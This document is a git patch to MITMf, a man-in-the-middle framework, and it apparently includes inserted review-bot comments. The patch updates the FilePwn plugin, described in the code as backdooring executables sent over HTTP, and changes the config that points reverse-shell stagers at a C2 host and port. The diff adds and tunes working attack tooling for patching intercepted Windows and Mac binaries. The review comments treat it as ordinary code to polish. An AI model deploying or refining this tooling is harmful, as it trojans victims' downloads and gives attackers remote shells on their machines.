From 5e9158ce0ad841caaf3be921dda8ed9f9ef26c9e Mon Sep 17 00:00:00 2001
From: byt3bl33d3r
Date: Tue, 14 Apr 2015 16:16:29 +0200
Subject: [PATCH] Updated FilePwn plugin with latest BDFProxy version

Removed exception handling in mitmf.py since I actually want a traceback
---
 config/mitmf.conf | 15 ++++++++----
 libs/bdfactory | 2 +-
 libs/responder | 2 +-
 mitmf.py | 30 ++++++++++-------------
 plugins/FilePwn.py | 60 ++++++++++++++++++++++++++--------------------
 5 files changed, 59 insertions(+), 50 deletions(-)

diff --git a/config/mitmf.conf b/config/mitmf.conf
index 9339e9e..f1f5b32 100644
--- a/config/mitmf.conf
+++ b/config/mitmf.conf
@@ -363,6 +363,7 @@
 FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large
 CompressedFiles = True #True/False
+
 [[[[LinuxIntelx86]]]]
 SHELL = reverse_shell_tcp # This is the BDF syntax
 HOST = 192.168.1.168 # The C2
@@ -378,10 +379,12 @@
 MSFPAYLOAD = linux/x64/shell_reverse_tcp
 [[[[WindowsIntelx86]]]]
- PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
+ PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
+ # PATCH_METHOD overwrites PATCH_TYPE with jump
+ PATCH_METHOD = automatic
 HOST = 192.168.1.16
- PORT = 4444
- SHELL = reverse_tcp_stager
+ PORT = 8443
+ SHELL = iat_reverse_tcp_stager_threaded
 SUPPLIED_SHELLCODE = None
 ZERO_CERT = False
 PATCH_DLL = True
@@ -389,10 +392,12 @@
 [[[[WindowsIntelx64]]]]
 PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
+ # PATCH_METHOD overwrites PATCH_TYPE with jump
+ PATCH_METHOD = automatic
 HOST = 192.168.1.16
 PORT = 8088
- SHELL = reverse_shell_tcp
- SUPPLIED_SHELLCODE = Nonepatchpatchpatch
+ SHELL = iat_reverse_tcp_stager_threaded
+ SUPPLIED_SHELLCODE = None
 ZERO_CERT = True
 PATCH_DLL = False
 MSFPAYLOAD = windows/x64/shell_reverse_tcp
diff --git a/libs/bdfactory b/libs/bdfactory
index 9ce83ea..e6af51b 160000
--- a/libs/bdfactory
+++ b/libs/bdfactory
@@ -1 +1 @@
-Subproject commit 9ce83ead5ddc4daa798b0f144b3cfeece6809c19
+Subproject commit e6af51b0c921e7c3dd5bb10a0d7b3983f46ca32b
diff --git a/libs/responder b/libs/responder
index e7a69e4..137e8ee 160000
--- a/libs/responder
+++ b/libs/responder
@@ -1 +1 @@
-Subproject commit e7a69e46c13f77c90300965a0897d13de6437f78
+Subproject commit 137e8eea61ef3c3d0426312a72894d6a4ed32cef
diff --git a/mitmf.py b/mitmf.py
index 42e8391..b2cdb19 100755
--- a/mitmf.py
+++ b/mitmf.py
@@ -149,26 +149,22 @@ print "[*] MITMf v%s online... initializing plugins" % mitmf_version
 load = []
 for p in plugins:
- try:
- if vars(args)[p.optname] is True:
- print "|_ %s v%s" % (p.name, p.version)
- if hasattr(p, 'tree_output') and p.tree_output:
- for line in p.tree_output:
- print "| |_ %s" % line
- p.tree_output.remove(line)
+ if vars(args)[p.optname] is True:
+ print "|_ %s v%s" % (p.name, p.version)
+ if hasattr(p, 'tree_output') and p.tree_output:
+ for line in p.tree_output:
+ print "| |_ %s" % line
+ p.tree_output.remove(line)
- if getattr(args, p.optname):
- p.initialize(args)
- load.append(p)
+ if getattr(args, p.optname):
+ p.initialize(args)
+ load.append(p)
- if vars(args)[p.optname] is True:
- if hasattr(p, 'tree_output') and p.tree_output:
- for line in p.tree_output:
- print "| |_ %s" % line
-
- except Exception:
- print "[-] Error loading plugin %s: %s" % (p.name, PrintException())
+ if vars(args)[p.optname] is True:
+ if hasattr(p, 'tree_output') and p.tree_output:
+ for line in p.tree_output:
+ print "| |_ %s" % line
 #Plugins are ready to go, start MITMf
 if args.disproxy:
diff --git a/plugins/FilePwn.py b/plugins/FilePwn.py
index 2d10897..987db4d 100644
--- a/plugins/FilePwn.py
+++ b/plugins/FilePwn.py
@@ -78,7 +78,7 @@ class FilePwn(Plugin):
 optname = "filepwn"
 desc = "Backdoor executables being sent over http using bdfactory"
 implements = ["handleResponse"]
- tree_output = ["BDFProxy v0.2 online"]
+ tree_output = ["BDFProxy v0.3.2 online"]
 version = "0.2"
 has_opts = False
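Review bot: The first `for line in p.tree_output:` loop on the new side still calls `p.tree_output.remove(line)` on the list it is iterating, which skips every second entry and leaves it in the list, so those lines are only printed by the second `tree_output` loop after `p.initialize(args)` has run. Print the list and then clear it: keep `print "| |_ %s" % line` as the loop body and follow the loop with `del p.tree_output[:]` at the `for` statement's indentation. The FilePwn `tree_output` in the next hunk holds a single entry, so the skipping only shows for plugins that report several lines. If `PrintException` was imported only for the removed handler, that import is presumably unused now; the import block is outside this hunk, so that needs confirming there.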
@@ -123,8 +123,6 @@ class FilePwn(Plugin):
 self.zipblacklist = self.userConfig['ZIP']['blacklist']
 self.tarblacklist = self.userConfig['TAR']['blacklist']
- self.output.append("BDFProxy by midnite_runr online")
-
 def convert_to_Bool(self, aString):
 if aString.lower() == 'true':
 return True
@@ -167,6 +165,10 @@ class FilePwn(Plugin):
 elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump':
 cave_jumping = True
+ # if automatic override
+ if self.WindowsIntelx64['PATCH_METHOD'].lower() == 'automatic':
+ cave_jumping = True
+
 targetFile = pebin.pebin(FILE=binaryFile,
 OUTPUT=os.path.basename(binaryFile),
 SHELL=self.WindowsIntelx64['SHELL'],
@@ -178,6 +180,7 @@ class FilePwn(Plugin):
 PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx64['PATCH_DLL']),
 SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'],
 ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx64['ZERO_CERT']),
+ PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower()
 )
 result = targetFile.run_this()
@@ -193,6 +196,10 @@ class FilePwn(Plugin):
 elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump':
 cave_jumping = True
+ # if automatic override
+ if self.WindowsIntelx86['PATCH_METHOD'].lower() == 'automatic':
+ cave_jumping = True
+
 targetFile = pebin.pebin(FILE=binaryFile,
 OUTPUT=os.path.basename(binaryFile),
 SHELL=self.WindowsIntelx86['SHELL'],
@@ -203,7 +210,8 @@ class FilePwn(Plugin):
 IMAGE_TYPE=self.WindowsType,
 PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']),
 SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'],
- ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT'])
+ ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT']),
+ PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower()
 )
 result = targetFile.run_this()
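Review bot: The new `self.WindowsIntelx64['PATCH_METHOD']` lookups (this hunk and the `PATCH_METHOD=` keyword in the hunk at line 178, plus their x86 twins at 193 and 203) raise a bare `KeyError` when this branch runs if a user's existing mitmf.conf predates the key this commit adds to the shipped config, whereas the constructor already reads the other sections' keys up front (`self.zipblacklist = self.userConfig['ZIP']['blacklist']` in the hunk at 123). Reading `PATCH_METHOD` once there, so a missing or misspelled key fails at start-up with a message naming the key rather than mid-request, would make the failure easier to diagnose. The comment `# if automatic override` could also state the rule the config file documents, e.g. `# PATCH_METHOD = automatic forces cave jumping regardless of PATCH_TYPE`. The enclosing method starts before this hunk and continues past it.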
@@ -236,7 +244,7 @@ class FilePwn(Plugin):
 )
 result = targetFile.run_this()
- elif binaryHeader[:4].encode('hex') in ['cefaedfe', 'cffaedfe', 'cafebabe']: # Macho
+ elif binaryHeader[:4].encode('hex') in ['cefaedfe', 'cffaedfe', 'cafebabe']: # Macho
 targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False)
 targetFile.support_check()
@@ -245,29 +253,29 @@ class FilePwn(Plugin):
 if targetFile.FAT_FILE is True:
 if self.FatPriority == 'x86':
 targetFile = machobin.machobin(FILE=binaryFile,
- OUTPUT = os.path.basename(binaryFile),
- SHELL=self.MachoIntelx86['SHELL'],
- HOST=self.MachoIntelx86['HOST'],
- PORT=int(self.MachoIntelx86['PORT']),
- SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
- FAT_PRIORITY=self.FatPriority
- )
+ OUTPUT=os.path.basename(binaryFile),
+ SHELL=self.MachoIntelx86['SHELL'],
+ HOST=self.MachoIntelx86['HOST'],
+ PORT=int(self.MachoIntelx86['PORT']),
+ SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
+ FAT_PRIORITY=self.FatPriority
+ )
 result = targetFile.run_this()
 elif self.FatPriority == 'x64':
 targetFile = machobin.machobin(FILE=binaryFile,
- OUTPUT = os.path.basename(binaryFile),
- SHELL=self.MachoIntelx64['SHELL'],
- HOST=self.MachoIntelx64['HOST'],
- PORT=int(self.MachoIntelx64['PORT']),
- SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
- FAT_PRIORITY=self.FatPriority
- )
+ OUTPUT=os.path.basename(binaryFile),
+ SHELL=self.MachoIntelx64['SHELL'],
+ HOST=self.MachoIntelx64['HOST'],
+ PORT=int(self.MachoIntelx64['PORT']),
+ SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
+ FAT_PRIORITY=self.FatPriority
+ )
 result = targetFile.run_this()
-
- elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7':
+
+ elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7':
 targetFile = machobin.machobin(FILE=binaryFile,
- OUTPUT = os.path.basename(binaryFile),
+ OUTPUT=os.path.basename(binaryFile),
 SHELL=self.MachoIntelx86['SHELL'],
 HOST=self.MachoIntelx86['HOST'],
 PORT=int(self.MachoIntelx86['PORT']),
@@ -276,9 +284,9 @@ class FilePwn(Plugin):
 )
 result = targetFile.run_this()
- elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007':
+ elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007':
 targetFile = machobin.machobin(FILE=binaryFile,
- OUTPUT = os.path.basename(binaryFile),
+ OUTPUT=os.path.basename(binaryFile),
 SHELL=self.MachoIntelx64['SHELL'],
 HOST=self.MachoIntelx64['HOST'],
 PORT=int(self.MachoIntelx64['PORT']),
@@ -286,7 +294,7 @@ class FilePwn(Plugin):
 FAT_PRIORITY=self.FatPriority
 )
 result = targetFile.run_this()
-
+
 self.patched.put(result)
 return
@@ -464,7 +472,7 @@ class FilePwn(Plugin):
 patchCount = 0
 wasPatched = False
-
+
 for info in zippyfile.infolist():
 print "[*] >>> Next file in zipfile:", info.filename